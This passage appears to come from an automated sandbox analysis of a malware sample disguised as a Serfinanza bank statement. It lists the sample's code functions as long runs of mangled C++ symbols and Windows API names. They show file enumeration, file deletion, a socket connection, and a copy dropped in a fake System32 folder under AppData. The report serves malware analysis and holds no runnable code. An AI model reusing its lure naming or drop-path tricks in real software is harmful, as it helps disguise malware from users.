          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 7_2_00404C0A
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 7_2_0040751B
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basi
c_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_tr7_2_00410586
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std
@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,7_2_0040728F
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begi
n@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE7_2_0040477E
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,7_2_00403325
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: 7_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 7_2_00412BEE
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00404C0A wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEA
AV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00404C0A
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040751B
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_stri
